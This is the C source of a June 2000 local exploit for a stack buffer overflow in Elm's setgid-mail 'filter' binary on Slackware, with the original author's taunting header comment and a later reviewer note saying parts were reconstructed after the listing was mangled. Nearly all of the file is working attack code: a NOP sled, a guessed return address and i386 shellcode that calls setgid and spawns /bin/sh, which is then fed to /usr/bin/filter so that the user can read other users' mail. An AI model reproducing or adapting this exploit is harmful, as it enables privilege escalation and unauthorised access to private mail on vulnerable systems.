/* Lo and behold, yet another "grab EGID mail on a Slack exploit" Almost a complete waste of valuable CPU time to execute... What is more questionable is who is maintaining the Elm package at this time, since this isn't just the second overflow I have seen in it and it probably won't be the last... Hope you all have a good time trying to read other people's mail (not that you can being EGID mail on most Slackware boxes, but hey :) Use as: filterape [offset] [EGID mail] Now you get nothing - use ^D to grab shell Cheers, Scrippie - #phreak.nl - buffer0verfl0w Security Do not contact me at: ronald@grafix.nl Love to: Maja, Hester Shouts to (in random order): RFP, ADM, HNN, buffer0verfl0w security, Wiretrip, #phreak.nl, #hit2000, gov-boi, TESO, lcamtuf, HWA, Yarvje (your NT coding skills rock), robje, ^MACE^, and everyone who doesn't want to be included here May a place be reserved in the fiery bowels of Hell for: [tri] - (of course no-one can hack your box when you firewall it dead, you should wonder if there is a bit of functionality left...) 
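Gerrie - Proud holder of the ScriptKiddie of the year award for the past 15 years
JP - That's a bit of a cliche :( */

/*
 * Historical (June 2000) proof-of-concept for a stack overflow in the Elm
 * "filter" binary shipped setgid "mail" on Slackware.  It builds an oversized
 * "-f" argument for /usr/bin/filter: a NOP sled, a guessed return address
 * (stack pointer minus an offset, Phrack 49 style), then an i386 Linux
 * setgid(gid) + execve("/bin/sh") shellcode.  Target, offsets and shellcode
 * are i386-only; this is of archival value only.
 *
 * Review notes: the listing had been mangled by an HTML stripper (every
 * "<...>" run was dropped), so the #include names and the loop that fills the
 * buffer in main() are reconstructed from the surviving fragments
 * ("foobar[i++] = (RTFM >> 8) & 0xff;" etc.) and the declared-but-otherwise-
 * unused get_sp()/RTFM/offset.  The argument validation, the NUL-in-address
 * check and the buffer-size check are new; they only make the program fail
 * loudly instead of silently emitting a truncated payload.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define EIP_OFF        517   /* saved EIP lives at bytes 517..520 of the buffer */
#define NOP            0x90  /* Hacker tool number one ;) */
#define MAILGID        12    /* Slackware "mail" group id (default EGID) */
#define DEFAULT_OFFSET 5400  /* What a bizarre offset :) */
#define RET_LEN        4     /* i386: 4-byte return address */
#define BUF_LEN        1000  /* Too lazy to malloc() */

/*
 * i386 Linux shellcode: setgid(MAILGID) via int 0x80 (0x2e), then
 * execve("/bin/sh") (0x0b).  The byte right after "\xb3" is the immediate of
 * "mov $gid, %bl"; main() patches it when an EGID is given on the command
 * line.  Contains no NUL bytes, so it survives as a C string.
 */
char shellcode[] =
    "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76"
    "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68";

/*
 * Return the current stack pointer.  The original relied on leaving the
 * value in %eax with no return statement; use an output operand instead.
 * Only meaningful on i386 (where the exploit runs); elsewhere return the
 * frame address so the file still builds.
 */
unsigned long get_sp(void)
{
    unsigned long sp;
#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
#else
    sp = (unsigned long) __builtin_frame_address(0);
#endif
    return sp;
}

/*
 * Parse a decimal integer strictly (whole string, no overflow).
 * Returns 0 on success and stores the value in *out, -1 otherwise.
 */
static int parse_long(const char *s, long *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE)
        return -1;
    *out = v;
    return 0;
}

/*
 * Usage: filterape [offset] [EGID]
 *   offset  subtracted from the stack pointer to guess the return address
 *           (default DEFAULT_OFFSET)
 *   EGID    group id patched into the shellcode, 1..255 (default MAILGID);
 *           0 is rejected because it would NUL-terminate the payload.
 * Never returns on success (execs /usr/bin/filter); returns 1 on error.
 */
int main(int argc, char **argv)
{
    char foobar[BUF_LEN];
    long offset = DEFAULT_OFFSET;
    unsigned char gid = MAILGID;
    unsigned long ret;
    size_t i, k;
    const size_t sclen = sizeof shellcode - 1;

    if (argc > 1 && parse_long(argv[1], &offset) != 0) {
        fprintf(stderr, "bad offset: %s\n", argv[1]);
        return 1;
    }

    if (argc > 2) {
        long g;
        char *patch;

        /* 0 would be a NUL inside the string; >255 does not fit "mov $imm8, %bl" */
        if (parse_long(argv[2], &g) != 0 || g < 1 || g > 255) {
            fprintf(stderr, "bad EGID (need 1..255): %s\n", argv[2]);
            return 1;
        }
        gid = (unsigned char) g;

        /* first 0x0c in the shellcode is the gid immediate after "\xb3" */
        patch = strchr(shellcode, MAILGID);
        if (patch == NULL) {
            fprintf(stderr, "shellcode gid byte not found\n");
            return 1;
        }
        *patch = (char) gid;
    }

    /* Payload cannot exceed the buffer: sled + address + shellcode + NUL. */
    if ((size_t) EIP_OFF + RET_LEN + sclen + 1 > sizeof foobar) {
        fprintf(stderr, "payload does not fit in %d bytes\n", BUF_LEN);
        return 1;
    }

    /* NOP sled up to the saved return address. */
    memset(foobar, NOP, EIP_OFF);
    i = EIP_OFF;

    /* Guessed return address, little-endian.  argv strings are NUL-terminated,
       so a zero byte inside the address would cut the payload short. */
    ret = get_sp() - (unsigned long) offset;
    for (k = 0; k < RET_LEN; k++) {
        unsigned char b = (unsigned char) ((ret >> (8 * k)) & 0xff);
        if (b == 0) {
            fprintf(stderr, "return address 0x%lx contains a NUL byte; "
                            "try another offset\n", ret);
            return 1;
        }
        foobar[i++] = (char) b;
    }

    /* Shellcode follows the address; copy its terminating NUL as well. */
    memcpy(foobar + i, shellcode, sclen + 1);

    execl("/usr/bin/filter", "I'm a scriptkiddie and I'm okay...", "-f", foobar,
          (char *) NULL);
    /* I scan all night, and I sleep all day... */
    perror("execl");
    return 1;
}
/* www.hack.co.za [8 June 2000]*/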